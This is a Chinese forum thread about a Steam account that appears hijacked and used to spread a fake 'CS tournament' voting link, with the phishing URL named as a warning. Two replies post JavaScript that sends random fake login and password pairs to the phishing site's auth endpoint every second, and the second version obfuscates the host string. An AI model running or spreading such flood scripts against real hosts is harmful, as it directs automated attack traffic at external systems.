V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
XiLingHost
V2EX  ›  信息安全

steam 的好友似乎被人盗号了

  •  
  •   XiLingHost · 2022-06-27 19:37:28 +08:00 · 1124 次点击
    这是一个创建于 640 天前的主题,其中的信息可能已经有所发展或是发生改变。

    刚才发消息说要给“CS 锦标赛”投票

    然后发了个一看就是钓鱼的网站,最离谱的是这个网站似乎不走梯子上不去

    https://pwexcup.com 注意,这是个钓鱼网站,请勿输入任何个人信息

    有一说一,这东西做的也太粗糙了,一堆元素点不进去

    5 条回复    2022-06-27 21:52:09 +08:00
    SunsetShimmer
        1
    SunsetShimmer  
       2022-06-27 19:43:35 +08:00
    zydxn
        2
    zydxn  
       2022-06-27 20:01:20 +08:00
    以前就见人发过

    https://www.v2ex.com/t/818457
    SunsetShimmer
        3
    SunsetShimmer  
       2022-06-27 20:16:09 +08:00   ❤️ 1
    function getRandomString(length) {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    for (var i = 0; i < length; i++)
    text += possible.charAt(Math.floor(Math.random() * possible.length));
    return text;
    }

    function getRandomInt(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
    }

    function get() {
    fetch("https://welcomepw.com/auth.php", {
    "headers": {
    "accept": "*/*",
    "accept-language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
    "sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Microsoft Edge\";v=\"103\", \"Chromium\";v=\"103\"",
    "sec-ch-ua-mobile": "?0",
    "sec-ch-ua-platform": "\"Windows\"",
    "sec-fetch-dest": "empty",
    "sec-fetch-mode": "cors",
    "sec-fetch-site": "same-origin",
    "x-requested-with": "XMLHttpRequest"
    },
    "referrer": "填自己的",
    "referrerPolicy": "strict-origin-when-cross-origin",
    "body": "doAuth=1&login=" + getRandomString(getRandomInt(8, 20)) + "&password=" + getRandomString(getRandomInt(12, 30)),
    "method": "POST",
    "mode": "cors",
    "credentials": "include"
    }).then(function (response) {
    return response.json();
    }
    ).then(function (data) {
    console.log(data);
    }
    ).catch(function (error) {
    console.log(error);
    }
    );
    }

    setInterval(get, 1000);
    SunsetShimmer
        4
    SunsetShimmer  
       2022-06-27 20:52:09 +08:00   ❤️ 2
    function getRandomString(length) {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    for (var i = 0; i < length; i++)
    text += possible.charAt(Math.floor(Math.random() * possible.length));
    return text;
    }

    function getRandomInt(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
    }

    function getFullURL() {
    return location.protocol + "//" + location.host + location.pathname;
    }

    function get() {
    // Rewrite with xhr
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "https:"+"//welcomepw"+".c"+"om/auth.php", true);
    xhr.setRequestHeader("accept", "*/*");
    xhr.setRequestHeader("accept-language", "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6");
    xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.setRequestHeader("x-requested-with", "XMLHttpRequest");
    xhr.onreadystatechange = function () {
    if (xhr.readyState == 4 && xhr.status == 200) {
    console.log(xhr.responseText);
    }
    }
    xhr.send("doAuth=1&login=" + getRandomString(getRandomInt(8, 20)) + "&password=" + getRandomString(getRandomInt(12, 30)));
    }

    setInterval(get, 1000);
    v2tudnew
        5
    v2tudnew  
       2022-06-27 21:52:09 +08:00
    密码管理器无法填充就知道有问题了。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   我们的愿景   ·   实用小工具   ·   975 人在线   最高记录 6543   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 20:19 · PVG 04:19 · LAX 13:19 · JFK 16:19
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.